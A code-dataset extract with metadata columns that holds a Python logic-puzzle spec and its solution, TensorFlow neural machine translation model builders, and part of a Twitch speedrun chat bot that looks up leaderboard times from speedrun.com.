hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e89220dd48bc543e64841c042d1dbdefd57a80f1
| 7,940
|
py
|
Python
|
src/puzzle/examples/msp/msp2017_06_21_pride_parade.py
|
PhilHarnish/forge
|
663f19d759b94d84935c14915922070635a4af65
|
[
"MIT"
] | 2
|
2020-08-18T18:43:09.000Z
|
2020-08-18T20:05:59.000Z
|
src/puzzle/examples/msp/msp2017_06_21_pride_parade.py
|
PhilHarnish/forge
|
663f19d759b94d84935c14915922070635a4af65
|
[
"MIT"
] | null | null | null |
src/puzzle/examples/msp/msp2017_06_21_pride_parade.py
|
PhilHarnish/forge
|
663f19d759b94d84935c14915922070635a4af65
|
[
"MIT"
] | null | null | null |
from puzzle.puzzlepedia import puzzle
def get():
return puzzle.Puzzle('Pride Parade', SOURCE)
SOURCE = """
position in range(1, 7 + 1)
color in {orange, blue, violet, green, pink, red, yellow}
name in {Phyllis, Patria, Harvey, Courtney, Kimball, Li, Christopher}
direction in {left, right}
def sees(dimension):
if dimension.left:
result = dimension.position - 1
else:
result = 7 - dimension.position
return result
def dist(a, b):
return abs(a.position - b.position) - 1
# The person in the orange float can see exactly x floats more than Phyllis can, where x is some number.
orange_sees = sees(orange)
phyllis_sees = sees(Phyllis)
orange_sees > phyllis_sees
# x == 2.
x = orange_sees - phyllis_sees
# If the blue and violet floats are facing the same direction, then Patria is in one of those floats; otherwise, Patria is in the green float.
if blue.left == violet.left:
Patria.blue or Patria.violet
else:
Patria.green
# The person in the blue float can see, directly in front of it, another float whose driver has x letters in his/her name.
# NOTE: Names are 2, 6, 7, 11 so x == 2 or x == 6. 6 is too big for z.
(x == 2)
# If x == 2: blue sees Li.
#if blue.left:
# blue[1] == False
# Li.position == blue.position - 1
#else:
# blue[7] == False
Li.position == blue.position + 1
blue.right == True
# There is an even number of floats between Harvey’s and the pink float (not including themselves).
float_distance = dist(Harvey, pink)
(float_distance == 2) or (float_distance == 4)
# The red float is the farthest west.
red.position[1] == True
# If Courtney’s float is blue, orange, violet, or green, then at least one of Courtney’s neighbors has a name containing the letter Y.
c_is_bovg = (Courtney.blue or Courtney.orange or Courtney.violet or Courtney.green)
if c_is_bovg:
dist(Phyllis, Courtney) == 0 or dist(Harvey, Courtney) == 0
# Harvey can see Kimball’s float directly in front of him.
Kimball.position == Harvey.position + 1
Harvey.right == True
#(Harvey.left * (Kimball.position == Harvey.position - 1)) or (Harvey.right * (Kimball.position == Harvey.position + 1))
#if Harvey.left:
# Kimball.position == Harvey.position - 1
#else:
# Kimball.position == Harvey.position + 1
# The violet float is next to the yellow float if and only if Li’s float is pink.
(Li == pink) == (abs(violet.position - yellow.position) == 1)
# The people in the orange and pink floats can see the blue float somewhere ahead.
blue_left_of_orange = blue.position < orange.position
orange.left == blue_left_of_orange
blue_right_of_orange = blue.position > orange.position
orange.right == blue_right_of_orange
blue_left_of_pink = blue.position < pink.position
pink.left == blue_left_of_pink
blue_right_of_pink = blue.position > pink.position
pink.right == blue_right_of_pink
# If Li’s float is east of Harvey’s, then Li’s float is either orange or pink.
if Li.position > Harvey.position:
Li.orange or Li.pink
# If Harvey’s float is red or orange, then Kimball’s float is a primary color.
if Harvey.red or Harvey.orange:
Kimball.red or Kimball.blue
# If the red and yellow floats are next to each other, then the person in the red float can see fewer than y other floats, where y = x + 1.
red_yellow_neighbors = abs(red.position - yellow.position) == 1
red_sees = sees(red)
y = x + 1
if red_yellow_neighbors:
red_sees < y
# If Christopher’s float is a secondary color, then he can see more floats than Courtney can.
if Christopher.violet or Christopher.orange or Christopher.green:
sees(Christopher) > sees(Courtney)
# The person in the red float has a name that is z letters long, where z = x * y.
# x = 2 or 6
# y = 3 or 7
# z = 6, 14, 18, 42
# Only "6" works.
z = x * y
(red == Harvey) or (red == Patria)
# The pink, violet, and green floats are facing the same direction.
pink.left == violet.left == violet.left == green.left
"""
SOURCE = """
position in range(1, 7 + 1)
color in {orange, blue, violet, green, pink, red, yellow}
name in {Phyllis, Patria, Harvey, Courtney, Kimball, Li, Christopher}
direction in {left, right}
def sees(dimension):
if dimension.left:
result = dimension.position - 1
else:
result = 7 - dimension.position
return result
# The person in the orange float can see exactly x floats more than Phyllis can, where x is some number.
orange_sees = sees(orange)
phyllis_sees = sees(Phyllis)
orange_sees > phyllis_sees
x = orange_sees - phyllis_sees
# If the blue and violet floats are facing the same direction, then Patria is in one of those floats; otherwise, Patria is in the green float.
if blue.left == violet.left:
Patria.blue or Patria.violet
else:
Patria.green
# The person in the blue float can see, directly in front of it, another float whose driver has x letters in his/her name.
# NOTE: Names are 2, 6, 7, 11 so x == 2 or x == 6. 6 is too big for z.
(x == 2)
# If x == 2: blue sees Li.
if blue.left:
blue[1] == False
all(Li[i - 1] == blue[i] for i in range(2, 8))
else:
blue[7] == False
all(Li[i + 1] == blue[i] for i in range(1, 7))
float_distance = abs(Harvey.position - pink.position) - 1
(float_distance == 2) ^ (float_distance == 4)
# The red float is the farthest west.
red.position[1] == True
# If Courtney’s float is blue, orange, violet, or green, then at least one of Courtney’s neighbors has a name containing the letter Y.
c_is_bovg = (Courtney.blue or Courtney.orange or Courtney.violet or Courtney.green)
c_left_neighbor_has_y = all(Phyllis[i - 1] or Harvey[i - 1] for i in range(2, 8) if Courtney[i])
c_right_neighbor_has_y = all(Phyllis[i + 1] or Harvey[i + 1] for i in range(1, 7) if Courtney[i])
if c_is_bovg:
c_left_neighbor_has_y or c_right_neighbor_has_y
# Harvey can see Kimball’s float directly in front of him.
if Harvey.left:
Harvey[1] == False
all(Kimball[i - 1] for i in range(2, 8) if Harvey[i])
else:
Harvey[7] == False
all(Kimball[i + 1] for i in range(1, 7) if Harvey[i])
# The violet float is next to the yellow float if and only if Li’s float is pink.
(Li == pink) == (abs(violet.position - yellow.position) == 1)
# The people in the orange and pink floats can see the blue float somewhere ahead.
blue_left_of_orange = blue.position < orange.position
orange.left == blue_left_of_orange
blue_right_of_orange = blue.position > orange.position
orange.right == blue_right_of_orange
blue_left_of_pink = blue.position < pink.position
pink.left == blue_left_of_pink
blue_right_of_pink = blue.position > pink.position
pink.right == blue_right_of_pink
# If Li’s float is east of Harvey’s, then Li’s float is either orange or pink.
if Li.position > Harvey.position:
Li.orange or Li.pink
# If Harvey’s float is red or orange, then Kimball’s float is a primary color.
if Harvey.red or Harvey.orange:
Kimball.red or Kimball.blue
# If the red and yellow floats are next to each other, then the person in the red float can see fewer than y other floats, where y = x + 1.
red_yellow_neighbors = abs(red.position - yellow.position) == 1
red_sees = sees(red)
y = x + 1
if red_yellow_neighbors:
red_sees < y
# If Christopher’s float is a secondary color, then he can see more floats than Courtney can.
if Christopher.violet or Christopher.orange or Christopher.green:
sees(Christopher) > sees(Courtney)
# The person in the red float has a name that is z letters long, where z = x * y.
# x = 2 or 6
# y = 3 or 7
# z = 6, 14, 18, 42
# Only "6" works.
z = x * y
(red == Harvey) or (red == Patria)
# The pink, violet, and green floats are facing the same direction.
pink.left == violet.left == violet.left == green.left
"""
SOLUTION = """
position | color | name | direction
1 | red | Harvey | right
2 | blue | Kimball | right
3 | orange | Li | left
4 | pink | Courtney | left
5 | violet | Christopher | left
6 | green | Patria | left
7 | yellow | Phyllis | right
"""
| 35.605381
| 142
| 0.704282
| 1,362
| 7,940
| 4.030837
| 0.101322
| 0.022951
| 0.020401
| 0.020401
| 0.885064
| 0.860291
| 0.850273
| 0.835701
| 0.835701
| 0.822587
| 0
| 0.017681
| 0.195088
| 7,940
| 222
| 143
| 35.765766
| 0.841339
| 0
| 0
| 0.751351
| 0
| 0.162162
| 0.982242
| 0.016121
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005405
| false
| 0
| 0.005405
| 0.005405
| 0.032432
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e8a6b76784f0a0ff78794f2b94770bc0bdb982ea
| 7,635
|
py
|
Python
|
tsf_nmt/build_ops.py
|
giancds/tsf_nmt
|
82d6fb338ec1395159dfee154b96761750304848
|
[
"Apache-2.0"
] | 71
|
2016-01-26T03:14:55.000Z
|
2022-02-27T20:27:00.000Z
|
tsf_nmt/build_ops.py
|
afcarl/tsf_nmt
|
82d6fb338ec1395159dfee154b96761750304848
|
[
"Apache-2.0"
] | 2
|
2016-05-16T06:54:06.000Z
|
2017-01-01T12:59:01.000Z
|
tsf_nmt/build_ops.py
|
afcarl/tsf_nmt
|
82d6fb338ec1395159dfee154b96761750304848
|
[
"Apache-2.0"
] | 19
|
2016-05-11T09:48:12.000Z
|
2018-08-05T16:50:15.000Z
|
# -*- coding: utf-8 -*-
import tensorflow as tf
from tensorflow.python.platform import gfile
import attention
import content_functions
import decoders
import nmt_models
def create_seq2seq_model(session, forward_only, model_path=None, use_best=False, FLAGS=None, buckets=None, translate=False):
"""Create translation model and initialize or load parameters in session."""
assert FLAGS is not None
assert buckets is not None
decode_input = FLAGS.decode_input
decode_file = FLAGS.decode_file
assert (decode_input is True and decode_file is False) \
or (decode_input is False and decode_file is True) \
or (decode_input is False and decode_file is False), \
'Cannot decode from input AND from file. Please choose just one option.'
# we should set batch to 1 when decoding
if decode_input or decode_file:
batch = 1
else:
batch = FLAGS.batch_size
dropout_rate = FLAGS.dropout
if translate:
dropout_rate = 0.0
if FLAGS.output_attention == "None":
if FLAGS.informed_decoder:
decoder = decoders.attention_decoder_informed
else:
decoder = decoders.attention_decoder
else:
if FLAGS.informed_decoder:
decoder = decoders.attention_decoder_output_informed
else:
decoder = decoders.attention_decoder_output
attention_f = attention.get_attention_f(FLAGS.attention_type)
content_function = content_functions.get_content_f(FLAGS.content_function)
decoder_attention_f = content_functions.get_decoder_content_f(FLAGS.output_attention)
model = nmt_models.Seq2SeqModel(source_vocab_size=FLAGS.src_vocab_size,
target_vocab_size=FLAGS.tgt_vocab_size,
buckets=buckets,
source_proj_size=FLAGS.proj_size,
target_proj_size=FLAGS.proj_size,
encoder_size=FLAGS.hidden_size,
decoder_size=FLAGS.hidden_size,
num_layers_encoder=FLAGS.num_layers,
num_layers_decoder=FLAGS.num_layers,
max_gradient_norm=FLAGS.max_gradient_norm,
batch_size=batch,
learning_rate=FLAGS.learning_rate,
learning_rate_decay_factor=FLAGS.learning_rate_decay_factor,
decoder=decoder,
optimizer=FLAGS.optimizer,
use_lstm=FLAGS.use_lstm,
input_feeding=FLAGS.input_feeding,
dropout=dropout_rate,
attention_f=attention_f,
window_size=FLAGS.window_size,
content_function=content_function,
decoder_attention_f=decoder_attention_f,
num_samples=FLAGS.num_samples_loss,
forward_only=forward_only,
max_len=FLAGS.max_len,
cpu_only=FLAGS.cpu_only,
early_stop_patience=FLAGS.early_stop_patience,
save_best_model=FLAGS.save_best_model,
log_tensorboard=FLAGS.log_tensorboard)
if model_path is None:
if use_best:
ckpt = tf.train.get_checkpoint_state(FLAGS.best_models_dir)
else:
ckpt = tf.train.get_checkpoint_state(FLAGS.train_dir)
if ckpt and gfile.Exists(ckpt.model_checkpoint_path):
print('Reading model parameters from %s' % ckpt.model_checkpoint_path)
model.saver.restore(session, ckpt.model_checkpoint_path)
else:
print('Created model with fresh parameters.')
session.run(tf.initialize_all_variables())
else:
print('Reading model parameters from %s' % model_path)
model.saver.restore(session, model_path)
return model
def create_nmt_model(session, forward_only, model_path=None, use_best=False, FLAGS=None, buckets=None, translate=False):
"""Create translation model and initialize or load parameters in session."""
assert FLAGS is not None
assert buckets is not None
decode_input = FLAGS.decode_input
decode_file = FLAGS.decode_file
assert (decode_input is True and decode_file is False) \
or (decode_input is False and decode_file is True) \
or (decode_input is False and decode_file is False), \
'Cannot decode from input AND from file. Please choose just one option.'
# we should set batch to 1 when decoding
if decode_input or decode_file:
batch = 1
else:
batch = FLAGS.batch_size
dropout_rate = FLAGS.dropout
if translate:
dropout_rate = 0.0
attention_f = attention.get_attention_f(FLAGS.attention_type)
content_function = content_functions.get_content_f(FLAGS.content_function)
decoder_attention_f = content_functions.get_decoder_content_f(FLAGS.output_attention)
model = nmt_models.NMTModel(source_vocab_size=FLAGS.src_vocab_size,
target_vocab_size=FLAGS.tgt_vocab_size,
buckets=buckets,
source_proj_size=FLAGS.proj_size,
target_proj_size=FLAGS.proj_size,
encoder_size=FLAGS.hidden_size,
decoder_size=FLAGS.hidden_size,
max_gradient_norm=FLAGS.max_gradient_norm,
batch_size=batch,
learning_rate=FLAGS.learning_rate,
learning_rate_decay_factor=FLAGS.learning_rate_decay_factor,
optimizer=FLAGS.optimizer,
input_feeding=FLAGS.input_feeding,
dropout=dropout_rate,
attention_f=attention_f,
window_size=FLAGS.window_size,
content_function=content_function,
decoder_attention_f=decoder_attention_f,
num_samples=FLAGS.num_samples_loss,
forward_only=forward_only,
max_len=FLAGS.max_len,
cpu_only=FLAGS.cpu_only,
early_stop_patience=FLAGS.early_stop_patience,
save_best_model=FLAGS.save_best_model)
if model_path is None:
if use_best:
ckpt = tf.train.get_checkpoint_state(FLAGS.best_models_dir)
else:
ckpt = tf.train.get_checkpoint_state(FLAGS.train_dir)
if ckpt and gfile.Exists(ckpt.model_checkpoint_path):
print('Reading model parameters from %s' % ckpt.model_checkpoint_path)
model.saver.restore(session, ckpt.model_checkpoint_path)
else:
print('Created model with fresh parameters.')
session.run(tf.initialize_all_variables())
else:
print('Reading model parameters from %s' % model_path)
model.saver.restore(session, model_path)
return model
| 43.135593
| 124
| 0.581532
| 819
| 7,635
| 5.107448
| 0.150183
| 0.033469
| 0.018647
| 0.021516
| 0.907961
| 0.905092
| 0.884533
| 0.884533
| 0.859192
| 0.859192
| 0
| 0.002261
| 0.362672
| 7,635
| 176
| 125
| 43.380682
| 0.857378
| 0.031696
| 0
| 0.839416
| 0
| 0
| 0.046612
| 0
| 0
| 0
| 0
| 0
| 0.043796
| 1
| 0.014599
| false
| 0
| 0.043796
| 0
| 0.072993
| 0.043796
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e8cc6a9faccd293e09c3f6891d4bcacfd13fbd19
| 48,471
|
py
|
Python
|
Run.py
|
unlink2/speedrunb0t
|
b80ab7a529503acf16a44e89f71b352b3e645f74
|
[
"MIT"
] | null | null | null |
Run.py
|
unlink2/speedrunb0t
|
b80ab7a529503acf16a44e89f71b352b3e645f74
|
[
"MIT"
] | null | null | null |
Run.py
|
unlink2/speedrunb0t
|
b80ab7a529503acf16a44e89f71b352b3e645f74
|
[
"MIT"
] | null | null | null |
import string
import re
import time
import math
import urllib.request
from urllib.request import urlopen
from json import loads
from Socket import openSocket, sendMessage
from Initialize import joinRoom
from Read import getUser, getMessage, getChannel
from Settings import COOLDOWN, IDENT, ADMIN, CLIENT_ID
from Games import GAMES, CATEGORIES, PLATFORMS
def getUserID(username):
try:
url = "https://api.twitch.tv/kraken/users?login={}".format(username)
hdr = {'Client-ID': 'eoe4ex6phzs05gspwg8kgms3joi7cm', 'Accept': 'application/vnd.twitchtv.v5+json'}
req = urllib.request.Request(url, headers=hdr)
response = urllib.request.urlopen(req)
except urllib.error.HTTPError as err:
raise LookupError('User not found')
return
readable = response.read().decode('utf-8')
lst = loads(readable)
USER_ID = lst['users'][0]['_id']
return USER_ID
def getStreamTitle(USER_ID):
try:
url = "https://api.twitch.tv/kraken/channels/{}".format(USER_ID)
hdr = {'Client-ID': 'eoe4ex6phzs05gspwg8kgms3joi7cm', 'Accept': 'application/vnd.twitchtv.v5+json'}
req = urllib.request.Request(url, headers=hdr)
response = urllib.request.urlopen(req)
except urllib.error.HTTPError as err:
raise LookupError('User not found')
return
readable = response.read().decode('utf-8')
lst = loads(readable)
title = lst['status'].lower()
return title
def getGame(USER_ID):
try:
url = "https://api.twitch.tv/kraken/channels/{}".format(USER_ID)
hdr = {'Client-ID': 'eoe4ex6phzs05gspwg8kgms3joi7cm', 'Accept': 'application/vnd.twitchtv.v5+json'}
req = urllib.request.Request(url, headers=hdr)
response = urllib.request.urlopen(req)
except urllib.error.HTTPError as err:
raise LookupError('User not found')
return
readable = response.read().decode('utf-8')
lst = loads(readable)
current_game = lst['game']
if isinstance(current_game, str) == True:
pass
else:
return None, None, None
for i in range(len(GAMES)):
if GAMES[i][0].lower() == current_game.lower():
game = GAMES[i][1]
platform = GAMES[i][3]
platform_title = GAMES[i][2]
return game, platform, platform_title
return None, None, None
def isEmulator(title):
if 'emulator' in title:
return True
else:
return False
def joinChannel(input):
if input == message.lower().strip() and CHANNEL == ADMIN:
global channel_list
is_joined = False
for chan in channel_list:
chan = chan.split(':')[0]
if chan == user:
is_joined = True
break
if is_joined == False:
with open('channels.txt', 'a') as f:
f.write(user + ":" + user + "\n")
channel_list.append(user + ":" + user)
s.send(("JOIN #" + user + "\r\n").encode())
sendMessage(s, user, "/me has joined.")
sendMessage(s, CHANNEL, "@" + user.title() + " speedrunb0t has successfully joined your channel.")
cooldown()
else:
sendMessage(s, CHANNEL, "@" + user.title() + " speedrunb0t is already in your channel.")
cooldown()
def addChannel(input):
if input == message.lower().split()[0] and user == ADMIN:
try:
newChannel = message.lower().split()[1]
except IndexError as err:
sendMessage(s, CHANNEL, "Error: Invalid syntax for the !addchannel command. Correct syntax is !addchannel <channel>")
return
try:
message.split()[2]
except IndexError as err:
pass
else:
sendMessage(s, CHANNEL, "Error: Invalid syntax for the !addchannel command. Correct syntax is !addchannel <channel>")
return
global channel_list
is_joined = False
for chan in channel_list:
chan = chan.split(':')[0]
if chan == newChannel:
is_joined = True
break
if is_joined == False:
with open('channels.txt', 'a') as f:
f.write(newChannel + ":" + newChannel + "\n")
channel_list.append(newChannel + ":" + newChannel)
s.send(("JOIN #" + newChannel + "\r\n").encode())
sendMessage(s, newChannel, "/me has joined.")
sendMessage(s, CHANNEL, "speedrunb0t has successfully joined " + newChannel.title() + "'s channel.")
cooldown()
return
else:
sendMessage(s, CHANNEL, "speedrunb0t is already in " + newChannel.title() + "'s channel.")
cooldown()
return
elif input == message.lower().split()[0] and user != ADMIN:
sendMessage(s, CHANNEL, "@" + user.title() + " Only the Bot Administrator may use the !addchannel command.")
cooldown()
return
def channels(input):
if input == message.lower().strip() and user == ADMIN:
global channel_list
channels = []
for chan in channel_list:
chan = chan.split(':')[0]
channels.append(chan)
channels_message = "speedrunb0t is currently being used in the following " + str(len(channels)) + " channels: " + str(channels)
if len(channels_message) < 500:
sendMessage(s, CHANNEL, channels_message)
elif len(channels_message) < 1000:
sendMessage(s, CHANNEL, channels_message[0:500])
sendMessage(s, CHANNEL, channels_message[500:])
else:
sendMessage(s, CHANNEL, "The list of channels is too long.")
elif input == message.lower().strip() and user != ADMIN:
sendMessage(s, CHANNEL, "@" + user.title() + " Only the Bot Administrator may use the !channels command.")
cooldown()
return
def setSRCName(input):
if input == message.lower().split()[0]:
if user == CHANNEL:
global channel_list
try:
new_srcname = message.lower().split(' ', 1)[1].strip()
except IndexError as err:
sendMessage(s, CHANNEL, "Error: Invalid syntax for the !setsrcname command. Correct syntax is !setsrcname <src_username>")
cooldown()
return
if ' ' in new_srcname:
sendMessage(s, CHANNEL, "Error: New Speedrun.com username must not contain whitespace")
cooldown()
return
new_line = user.lower() + ":" + new_srcname.lower()
with open("channels.txt", "r+") as f:
for chan in channel_list:
if chan.split(':')[0] == user:
channel_list.remove(chan)
channel_list.append(new_line)
f.truncate(0)
f.writelines(channel_list)
break
sendMessage(s, CHANNEL, "The Speedrun.com username associated with this channel has been set to \'" + new_srcname + "\'.")
cooldown()
elif user != CHANNEL:
sendMessage(s, CHANNEL, "@" + user.title() + " Only the channel owner may use this command.")
cooldown()
#Returns the world record for the category that's written in the stream title
def worldRecord(input):
if input == message.lower().split()[0].strip():
#Check to see if an argument is specified first
argument = False
try:
message.lower().split()[1]
except IndexError as err:
pass
else:
argument = True
#get user ID of current channel
try:
USER_ID = getUserID(CHANNEL)
except LookupError as err:
sendMessage(s, CHANNEL, "User not found")
cooldown()
return
#get title of current channel
title = getStreamTitle(USER_ID)
if isEmulator(title):
emulators = 'true'
else:
emulators = 'false'
game, platform, platform_title = getGame(USER_ID)
if '[' in title and ']' in title:
for i in range(len(PLATFORMS)):
if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
platform = PLATFORMS[i][1]
platform_title = PLATFORMS[i][0]
break
category = None
category_title = None
#Check again to see if an argument was specified
if argument == False:
for i in range(len(CATEGORIES)):
if CATEGORIES[i][0].lower() in title:
category = CATEGORIES[i][1]
category_title = CATEGORIES[i][0]
break
elif argument == True:
specified_category = message.lower().split(input, 1)[-1].strip()
for i in range(len(CATEGORIES)):
if specified_category == CATEGORIES[i][0].lower():
category_title = CATEGORIES[i][0]
category = CATEGORIES[i][1]
break
if category == None:
sendMessage(s, CHANNEL, "Error: Invalid category specified")
cooldown()
return
if game == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
if category != None:
try:
response = urlopen('https://www.speedrun.com/api/v1/leaderboards/{}/category/{}?top=1&embed=players&platform={}&emulators={}'.format(game, category, platform, emulators))
except urllib.error.HTTPError as err:
sendMessage(s, CHANNEL, "HTTPError: Please try again")
cooldown()
return
readable = response.read().decode('utf-8')
lst = loads(readable)
runner = lst['data']['players']['data'][0]['names']['international']
time_in_sec = int(lst['data']['runs'][0]['run']['times']['realtime_t'])
hours = divmod(time_in_sec, 3600)
minutes = divmod(hours[1], 60)
seconds = minutes[1]
wr = ''
if hours[0] > 0:
wr = str(hours[0]) + "h " + str(minutes[0]) + "m " + str(seconds) + "s "
elif minutes[0] > 0:
wr = str(minutes[0]) + "m " + str(seconds) + "s "
else:
wr = str(seconds) + "s "
sendMessage(s, CHANNEL, "The " + category_title + " world record is " + wr + "by " + runner + ".")
cooldown()
return
elif category == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
def second(input):
if input == message.lower().split()[0].strip():
#Check to see if an argument is specified first
argument = False
try:
message.lower().split()[1]
except IndexError as err:
pass
else:
argument = True
#get user ID of current channel
try:
USER_ID = getUserID(CHANNEL)
except LookupError as err:
sendMessage(s, CHANNEL, "User not found")
cooldown()
return
#get title of current channel
title = getStreamTitle(USER_ID)
if isEmulator(title):
emulators = 'true'
else:
emulators = 'false'
game, platform, platform_title = getGame(USER_ID)
if '[' in title and ']' in title:
for i in range(len(PLATFORMS)):
if PLATFORMS[i][0].lower() == title.split('[')[1].split(']')[0]:
platform = PLATFORMS[i][1]
platform_title = PLATFORMS[i][0]
break
category = None
category_title = None
#Check again to see if an argument was specified
if argument == False:
for i in range(len(CATEGORIES)):
if CATEGORIES[i][0].lower() in title:
category = CATEGORIES[i][1]
category_title = CATEGORIES[i][0]
break
elif argument == True:
specified_category = message.lower().split(input, 1)[-1].strip()
for i in range(len(CATEGORIES)):
if specified_category == CATEGORIES[i][0].lower():
category_title = CATEGORIES[i][0]
category = CATEGORIES[i][1]
break
if category == None:
sendMessage(s, CHANNEL, "Error: Invalid category specified")
cooldown()
return
if game == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
if category != None:
try:
response = urlopen('https://www.speedrun.com/api/v1/leaderboards/{}/category/{}?top=2&embed=players&platform={}&emulators={}'.format(game, category, platform, emulators))
except urllib.error.HTTPError as err:
sendMessage(s, CHANNEL, "HTTPError: Please try again")
cooldown()
return
readable = response.read().decode('utf-8')
lst = loads(readable)
runner = lst['data']['players']['data'][1]['names']['international']
time_in_sec = int(lst['data']['runs'][1]['run']['times']['realtime_t'])
hours = divmod(time_in_sec, 3600)
minutes = divmod(hours[1], 60)
seconds = minutes[1]
place2nd = ''
if hours[0] > 0:
place2nd = str(hours[0]) + "h " + str(minutes[0]) + "m " + str(seconds) + "s "
elif minutes[0] > 0:
place2nd = str(minutes[0]) + "m " + str(seconds) + "s "
else:
place2nd = str(seconds) + "s "
sendMessage(s, CHANNEL, "The 2nd place time for " + category_title + " is " + place2nd + "by " + runner + ".")
cooldown()
return
elif category == None:
sendMessage(s, CHANNEL, "Error: No game/category info found in stream title")
cooldown()
return
def third(input):
    """Post the 3rd place leaderboard time for the current game/category.

    Triggered when the first word of the chat message equals *input*
    (e.g. "!3rd"). The category is taken from an optional argument after
    the command, otherwise detected from the stream title. Reads module
    globals (message, s, CHANNEL, CATEGORIES, PLATFORMS) and sends the
    result to chat.
    """
